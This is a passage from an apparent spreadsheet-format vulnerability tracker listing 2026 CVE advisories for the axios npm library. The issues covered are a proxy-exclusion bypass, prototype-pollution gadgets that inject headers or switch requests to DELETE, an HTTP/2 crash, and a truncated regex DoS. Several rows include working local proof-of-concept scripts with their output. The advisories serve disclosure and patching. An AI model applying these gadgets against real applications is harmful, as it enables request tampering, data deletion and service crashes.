  } else if (proxyHits === 0 &amp;&amp; internalHits &gt; 0) {
    console.log(`POC RESULT: axios bypassed the proxy with NO_PROXY=${noProxy}.`);
  } else {
    console.log('POC RESULT: mixed/ambiguous routing; inspect counts above.');
  }
} finally {
  delete process.env.http_proxy;
  delete process.env.HTTP_PROXY;
  delete process.env.no_proxy;
  delete process.env.NO_PROXY;
  await close(proxy);
  await close(internal);
}
```
Run the failing CIDR case:
```bash
POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Observed:
```text
Axios NO_PROXY CIDR full axios network PoC
axios VERSION=1.17.0
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:34315
Target URL=http://127.0.0.1:43993/metadata
Response=proxy saw request for http://127.0.0.1:43993/metadata
Proxy hits=1
Internal direct hits=0
POC RESULT: axios sent the target through the proxy with NO_PROXY=127.0.0.0/8.
```
## Control
Axios does honor exact IP `NO_PROXY` entries:
```bash
POC_INTERNAL_HOST=127.0.0.1 POC_NO_PROXY=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Expected:
```text
NO_PROXY=127.0.0.1
Response=internal service saw /metadata
Proxy hits=0
Internal direct hits=1
POC RESULT: axios bypassed the proxy with NO_PROXY=127.0.0.1.
```
This shows the issue is not that `NO_PROXY` is ignored entirely. The bypass failure is specific to CIDR-form entries such as `127.0.0.0/8`.
## Impact
This is a proxy exclusion bypass caused by unsupported CIDR matching in `NO_PROXY`.
The impact is configuration-dependent. It affects Axios users in Node.js environments who rely on proxy environment variables and configure `NO_PROXY` using CIDR notation to exclude internal, loopback, private, Kubernetes, CI, or cloud metadata ranges.
Potentially impacted environments include:
- CI/CD runners with globally injected `HTTP_PROXY` / `HTTPS_PROXY`.
- Containers inheriting proxy variables from the host or orchestrator.
- Kubernetes workloads using `NO_PROXY` for cluster-internal service ranges.
- Enterprise networks using HTTP proxies with internal network exclusions.
- Cloud workloads relying on `NO_PROXY` to keep metadata or internal service requests off proxy infrastructure.
If a configured proxy is compromised, attacker-controlled, overly broad, or outside the intended trust boundary, requests that operators expected to stay direct may instead be exposed to that proxy. This may expose request URLs, internal hostnames, paths, headers, or credentials depending on application behavior.
This should not be characterized as arbitrary proxy injection by itself. The issue is that Axios silently fails to enforce common CIDR-form proxy exclusions, which can undermine proxy bypass policy and defense-in-depth assumptions.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101899</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101900</t>
        </is>
      </c>
      <c r="D597" s="5" t="inlineStr"/>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M597" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr"/>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios contains a guard in the Node HTTP adapter to avoid using an inherited `Object.prototype.getHeaders` as a FormData header source. The fetch adapter calls the shared `resolveConfig()` helper before dispatch, and that helper lacks the same guard. If another vulnerability pollutes `Object.prototype` with FormData-like properties and `getHeaders()`, the fetch adapter can merge attacker-controlled headers into the outbound request.
Axios does not create the prototype pollution source. This is a read-side gadget in the fetch adapter configuration path.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into fetch-adapter requests. Depending on the target service, this may affect authorization, metadata-service access, cache behavior, conditional request handling, or other application-specific header logic.
Plain objects are blocked by current FormData detection. The confirmed path uses arrays or non-plain class instances whose prototype chain can resolve polluted FormData-like properties.
## Affected Functionality
Affected:
- Fetch adapter requests.
- `resolveConfig()` handling of `utils.isFormData(data)`.
- Request bodies that can be spoofed as FormData through inherited `Symbol.toStringTag`, `append`, and `getHeaders`.
Not affected:
- Node HTTP adapter's later FormData header path, which checks `data.getHeaders !== Object.prototype.getHeaders`.
- Plain object request bodies rejected by current `isFormData()` plain-object guard.
- Processes without prototype pollution.
## Technical Details
`lib/helpers/resolveConfig.js` currently contains:
```js
if (utils.isFormData(data)) {
  if (platform.hasStandardBrowserEnv || platform.hasStandardBrowserWebWorkerEnv || utils.isReactNative(data)) {
    headers.setContentType(undefined);
  } else if (utils.isFunction(data.getHeaders)) {
    setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
  }
}
```
Unlike `lib/adapters/http.js`, this code does not reject `Object.prototype.getHeaders`. Local verification on axios `1.18.1` polluted `Object.prototype[Symbol.toStringTag]`, `append`, and `getHeaders`, then sent an array body with `adapter: 'fetch'`. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype[Symbol.toStringTag] = 'FormData';
Object.prototype.append = function () {};
Object.prototype.getHeaders = () =&gt; ({ 'X-Poisoned': 'yes' });
await axios.post(url, ['a', 'b'], { adapter: 'fetch' });
```
Expected safe behavior is that inherited `Object.prototype.getHeaders` is ignored. Current affected behavior merges the returned header.
## Workarounds
Use the Node HTTP adapter for server-side requests that may run in a polluted process. Avoid passing array or class-instance bodies through the fetch adapter when prototype pollution is suspected.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
The Node HTTP adapter contains a guard that prevents `Object.prototype.getHeaders` from being used as a FormData header source. The shared `resolveConfig()` helper does not have the same guard. The fetch adapter calls `resolveConfig()`, so it can still merge headers returned by inherited `data.getHeaders()`.
This is a patch mismatch for the FormData prototype-pollution header-injection class.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- Application uses `adapter: 'fetch'`.
- A separate prototype-pollution primitive can write:
  - `Object.prototype[Symbol.toStringTag] = 'FormData'`
  - `Object.prototype.append = function () {}`
  - `Object.prototype.getHeaders = function () { ... }`
- The request body is an array or custom class instance. Plain objects are blocked by the current `isFormData()` plain-object guard.
## Root Cause
`lib/adapters/http.js` contains:
```js
data.getHeaders !== Object.prototype.getHeaders
```
But `lib/helpers/resolveConfig.js` only checks:
```js
} else if (utils.isFunction(data.getHeaders)) {
  setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
}
```
The fetch adapter calls `resolveConfig(config)` before dispatching the request.
## Impact
An attacker can inject arbitrary headers into fetch-adapter requests. This may be used to influence internal APIs, metadata services, cache behavior, or application-specific authorization checks.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer((req, res) =&gt; {
    let body = '';
    req.on('data', (chunk) =&gt; (body += chunk));
    req.on('end', () =&gt; handler(req, res, body));
  });
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const tag = Symbol.toStringTag;
const server = await start((req, res, body) =&gt; {
  hits.push({ headers: req.headers, body });
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype[tag] = 'FormData';
  Object.prototype.append = function () {};
  Object.prototype.getHeaders = () =&gt; {
    const headers = Object.create(null);
    headers['X-Poisoned'] = 'yes';
    return headers;
  };
  await axios.post(`http://127.0.0.1:${server.address().port}/fetch-formdata`, ['a', 'b'], {
    adapter: 'fetch',
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype[tag];
  delete Object.prototype.append;
  delete Object.prototype.getHeaders;
  await stop(server);
}
```
Observed wire request:
```json
{
  "headers": {
    "x-poisoned": "yes",
    "content-type": "text/plain;charset=UTF-8",
    "content-length": "3"
  },
  "body": "a,b"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9
- https://osv.dev/vulnerability/GHSA-6chq-wfr3-2hj9
- Related patch area: `lib/adapters/http.js`, `lib/helpers/resolveConfig.js`
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101900</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D598" s="5" t="inlineStr"/>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M598" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr"/>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.
This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.
## Impact
The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.
This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.
## Affected Functionality
Affected path:
- Node.js HTTP adapter
- httpVersion: 2
- HTTP/2 session creation/reuse through Http2Sessions
- Network/session failures emitted as ClientHttp2Session error events
Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.
## Technical Details
Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.
When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.
## Proof of Concept of Attack
```js
import axios from './index.js';
await axios.get('http://127.0.0.1:1/', {
  httpVersion: 2,
  timeout: 1000
});
```
Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.
## Workarounds
Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hi, i'm RelunSec a security researcher working with **InsiteTech.jp**
i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server
```js
const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default; 
const url = require('url');
// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/'; 
const PORT = 3000;
const server = http.createServer(async (req, res) =&gt; {
  const parsedUrl = url.parse(req.url, true);
  const http2optionId = parsedUrl.query.http2optionId;
  if (!http2optionId) {
  console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
  res.writeHead(400, { 'Content-Type': 'text/plain' });
  res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
  return; 
}
  console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);
  // Create an Axios instance configured for HTTP/2
  // The 'id' in http2Options makes each session configuration unique.
  const axiosInstance = axios.create({
    baseURL: TARGET_URL,
    httpVersion: 2,
    http2Options: {
      // rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
      id: http2optionId, // This is the attacker-controlled unique part
    },
    // Adding a short timeout to prevent attacker from waiting too long if target is slow
    timeout: 5000 
  });
  try {
    const response = await axiosInstance.get('/');
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
  } catch (error) {
    // Check for the specific error indicating session limit reached
    if (error.isAxiosError &amp;&amp; error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
    } else {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
    }
  }
});
server.listen(PORT, () =&gt; {
  console.log(`PoC Server listening on http://localhost:${PORT}`);
  console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
  console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
  console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});
```
i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do
```rust
relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server
```
that is extremly simple to trigger
it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101902</t>
        </is>
      </c>
      <c r="D599" s="5" t="inlineStr"/>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M599" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr"/>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios default-instance requests that omit an explicit method can read an inherited `method` value from `Object.prototype`. If another vulnerability in the same process pollutes `Object.prototype.method`, calls such as `axios.request({ url })` and `axios({ url })` can send a state-changing HTTP method instead of the expected default `GET`.
Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch.
## Impact
In an affected application with a separate prototype-pollution primitive, an attacker can change axios default-instance requests that omit `method` from `GET` to methods such as `DELETE`, `POST`, `PUT`, or `PATCH`. The practical impact depends on the target endpoint and can include unintended writes, deletion, or other state changes.
Method aliases such as `axios.get(url)` and requests with an explicit own `method` are not affected by the confirmed method path.
## Affected Functionality
Affected:
- Default axios instance calls: `axios.request({ url })`.
- Callable shorthand: `axios({ url })`.
- Requests where no own `config.method` is provided.
Not affected in the confirmed method PoC:
- `axios.get(url)` and other method aliases.
- `axios.request({ url, method: 'GET' })`.
- `axios.create().request({ url })` when the created instance defaults are produced by current `mergeConfig()` and do not inherit from `Object.prototype`.
## Technical Details
`lib/core/Axios.js` sets the request method with:
```js
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
`mergeConfig()` now returns a null-prototype request config, so `config.method` is safe from `Object.prototype`. However, the default axios instance stores the module defaults object as `this.defaults`, and that defaults object is a normal object. If `Object.prototype.method` exists, `this.defaults.method` resolves to the polluted inherited value.
Local verification on axios `1.18.1` showed a default-instance `axios.request({ url })` request reaching a loopback server as `DELETE` after `Object.prototype.method = 'DELETE'`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.method = 'DELETE';
try {
  await axios.request({ url: 'http://127.0.0.1:&lt;port&gt;/resource' });
} finally {
  delete Object.prototype.method;
}
```
Expected safe behavior is a `GET` request. Current affected behavior sends `DELETE` on the default instance when no method is provided.
## Workarounds
Use explicit method aliases such as `axios.get()` or set an own `method` on request configs. Avoid default-instance shorthand for requests in processes where prototype pollution is suspected or possible.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
Axios `1.17.0` contains a read-side prototype-pollution gadget in the default Axios instance. If another vulnerability in the same Node.js process pollutes `Object.prototype.method`, default-instance calls such as `axios.request({ url })` and `axios({ url })` can be forced to use an attacker-controlled HTTP method, such as `DELETE`, instead of the expected default `GET`.
Axios does not create the prototype pollution by itself. The issue is that Axios reads fallback values from `this.defaults` without an own-property guard, allowing inherited values from `Object.prototype` to influence request behavior.
This should be treated as a prototype-pollution gadget, not as a standalone prototype-pollution source. In other words, Axios is not the component that lets the attacker write to `Object.prototype`; Axios is the component that becomes dangerous after `Object.prototype` has already been polluted by another bug in the same process.
### Details
The vulnerable fallback read is in `lib/core/Axios.js`:
```js
// Set config.allowAbsoluteUrls
if (config.allowAbsoluteUrls !== undefined) {
  // do nothing
} else if (this.defaults.allowAbsoluteUrls !== undefined) {
  config.allowAbsoluteUrls = this.defaults.allowAbsoluteUrls;
} else {
  config.allowAbsoluteUrls = true;
}
// Set config.method
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
The merged request `config` is created as a null-prototype object in `lib/core/mergeConfig.js`:
```js
const config = Object.create(null);
```
Therefore, when the caller does not provide `config.method`, the fallback becomes:
```js
this.defaults.method
```
The default Axios instance uses the module defaults object. In the tested version, that defaults object is affected by inherited properties from `Object.prototype`. If `Object.prototype.method` is polluted, `this.defaults.method` resolves to that inherited value and Axios uses it as the request method.
The same unsafe inherited-property pattern also affects `this.defaults.allowAbsoluteUrls`, which can change how absolute URLs are combined with `baseURL`.
### Proof of Concept
#### Access and Attack Conditions
No admin access is required for Axios itself. This is a library-level gadget.
The attacker must have an existing way to pollute `Object.prototype` in the same Node.js process, for example through a separate prototype-pollution vulnerability in another dependency or application input path. Axios is the gadget that turns that pollution into dangerous HTTP request behavior.
Required condition:
```text
Some other bug or unsafe merge path in the application must allow Object.prototype pollution.
```
What Axios contributes:
```text
Axios reads inherited Object.prototype.method through this.defaults.method and uses it as the HTTP method fallback.
```
What Axios does not do:
```text
Axios does not create Object.prototype pollution by itself.
```
Affected usage:
```js
axios.request({ url });
axios({ url });
```
Not affected in the confirmed PoC:
```js
axios.get(url);
axios.request({ url, method: "GET" });
axios.create().request({ url });
```
#### Reproduction Steps
1. Create a clean test directory and install Axios `1.17.0`:
```powershell
mkdir axios-validation
cd axios-validation
npm init -y
npm install axios@1.17.0 --no-audit --no-fund
```
2. Save the method override PoC below as:
```text
validate-prototype-method-gadget.mjs
```
3. Run the PoC:
```powershell
node validate-prototype-method-gadget.mjs
```
4. Confirm that the output shows:
```text
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
5. This proves that after `Object.prototype.method = "DELETE"`, default-instance calls that omit an explicit method are sent as `DELETE`.
#### What the Method PoC Script Does
The PoC starts a temporary local HTTP server for each Axios call and records the HTTP method received by that server. It then simulates an already-existing prototype-pollution condition by setting:
```js
Object.prototype.method = "DELETE";
```
While that pollution is active, the script sends five Axios requests:
```js
axios.request({ url });                 // expected vulnerable path
axios({ url });                         // expected vulnerable shorthand path
axios.get(url);                         // expected safe alias path
axios.request({ url, method: "GET" });  // expected safe explicit-method path
axios.create().request({ url });        // expected safe isolated-instance path
```
The script then deletes the polluted property:
```js
delete Object.prototype.method;
```
Finally, it prints the method observed by the local server for each request. The vulnerable behavior is confirmed when the default Axios instance sends `DELETE` for `axios.request({ url })` and `axios({ url })`, while the safe comparison paths still send `GET`.
#### Method Override PoC
Create `validate-prototype-method-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runRequest(label, requestFn) {
  const hits = [];
  const server = http.createServer((req, res) =&gt; {
    hits.push({
      method: req.method,
      url: req.url,
    });
    res.writeHead(200, { "content-type": "application/json" });
    res.end(JSON.stringify({ ok: true }));
  });
  const port = await listen(server);
  const url = `http://127.0.0.1:${port}/${label}`;
  let status = "completed";
  let error = "";
  try {
    await requestFn(url);
  } catch (err) {
    status = "error";
    error = err?.message || String(err);
  }
  server.close();
  return { label, status, error, hits };
}
const results = [];
Object.prototype.method = "DELETE";
try {
  results.push(await runRequest("default-request-no-method", (url) =&gt; axios.request({ url })));
  results.push(await runRequest("default-shorthand-no-method", (url) =&gt; axios({ url })));
  results.push(await runRequest("default-get-alias", (url) =&gt; axios.get(url)));
  results.push(await runRequest("default-request-explicit-get", (url) =&gt; axios.request({ url, method: "GET" })));
  const instance = axios.create();
  results.push(await runRequest("created-instance-request-no-method", (url) =&gt; instance.request({ url })));
} finally {
  delete Object.prototype.method;
}
const defaultRequestMethod = results.find((r) =&gt; r.label === "default-request-no-method")?.hits[0]?.method || "";
const defaultShorthandMethod = results.find((r) =&gt; r.label === "default-shorthand-no-method")?.hits[0]?.method || "";
const getAliasMethod = results.find((r) =&gt; r.label === "default-get-alias")?.hits[0]?.method || "";
const explicitGetMethod = results.find((r) =&gt; r.label === "default-request-explicit-get")?.hits[0]?.method || "";
const createdInstanceMethod = results.find((r) =&gt; r.label === "created-instance-request-no-method")?.hits[0]?.method || "";
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
console.log(`defaultRequestMethod=${defaultRequestMethod}`);
console.log(`defaultShorthandMethod=${defaultShorthandMethod}`);
console.log(`getAliasMethod=${getAliasMethod}`);
console.log(`explicitGetMethod=${explicitGetMethod}`);
console.log(`createdInstanceMethod=${createdInstanceMethod}`);
const confirmed =
  defaultRequestMethod === "DELETE" &amp;&amp;
  defaultShorthandMethod === "DELETE" &amp;&amp;
  getAliasMethod === "GET" &amp;&amp;
  explicitGetMethod === "GET" &amp;&amp;
  createdInstanceMethod === "GET";
console.log(confirmed ? "RESULT: CONFIRMED" : "RESULT: NOT CONFIRMED");
process.exitCode = confirmed ? 0 : 1;
```
Run:
```powershell
node validate-prototype-method-gadget.mjs
```
Observed result:
```text
axiosVersion=1.17.0
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
The local server received:
```text
axios.request({ url })              -&gt; DELETE
axios({ url })                      -&gt; DELETE
axios.get(url)                      -&gt; GET
axios.request({ url, method:"GET" }) -&gt; GET
axios.create().request({ url })     -&gt; GET
```
This confirms that inherited `Object.prototype.method` controls the default method for vulnerable default-instance request paths.
#### Supporting `allowAbsoluteUrls` Gadget Evidence
The same inherited-property issue affects `allowAbsoluteUrls`.
Create `validate-prototype-allowabsoluteurls-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runCase(label, requestFn) {
  const baseHits = [];
  const absoluteHits = [];
  const baseServer = http.createServer((req, res) =&gt; {
    baseHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("base");
  });
  const absoluteServer = http.createServer((req, res) =&gt; {
    absoluteHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("absolute");
  });
  const basePort = await listen(baseServer);
  const absolutePort = await listen(absoluteServer);
  try {
    await requestFn({
      baseURL: `http://127.0.0.1:${basePort}/api`,
      url: `http://127.0.0.1:${absolutePort}/absolute-path`,
    });
  } catch {}
  baseServer.close();
  absoluteServer.close();
  return { label, baseHits, absoluteHits };
}
const results = [];
results.push(await runCase("baseline-no-pollution", (config) =&gt; axios.request(config)));
Object.prototype.allowAbsoluteUrls = false;
try {
  results.push(await runCase("polluted-default-request", (config) =&gt; axios.request(config)));
  const instance = axios.create();
  results.push(await runCase("polluted-created-instance", (config) =&gt; instance.request(config)));
} finally {
  delete Object.prototype.allowAbsoluteUrls;
}
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
```
Observed result:
```text
axiosVersion=1.17.0
baselineUsedAbsolute=true
pollutedDefaultUsedBase=true
pollutedInstanceUsedAbsolute=true
RESULT: CONFIRMED
```
Without pollution, Axios sends the request to the absolute URL. After `Object.prototype.allowAbsoluteUrls = false`, the default Axios instance combines the absolute URL with `baseURL` and sends the request to the base server instead. An instance created with `axios.create()` remains unaffected.
### Impact
This is a prototype-pollution gadget. It becomes exploitable when an application has any separate prototype-pollution primitive that allows an attacker to set properties on `Object.prototype` in the same Node.js process.
If such pollution is possible, an attacker can influence Axios default-instance requests that omit an explicit method:
- `axios.request({ url })`
- `axios({ url })`
This can turn an expected safe default `GET` request into a state-changing method such as:
- `DELETE`
- `POST`
- `PUT`
- `PATCH`
Potential impact includes unauthorized state-changing requests, deletion of resources, unintended writes, data corruption, or denial of service when the target endpoint treats the HTTP method as security-relevant.
The issue does not require admin access to Axios itself, but it does require an existing prototype-pollution path in the application. Applications that always use explicit methods, method aliases such as `axios.get()`, or isolated instances created through `axios.create()` are not affected by the confirmed method-override path.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101902</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D600" s="5" t="inlineStr"/>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M600" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr"/>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js parses `data:` URLs in `lib/helpers/fromDataURI.js`. The current RFC-2397 parser uses a regular expression whose media type groups allow `/` inside both sides of the `type/subtype` match. A malformed `data:` URL containing many slashes and no comma forces the JavaScript regex engine to try many possible placements for the separator before failing.
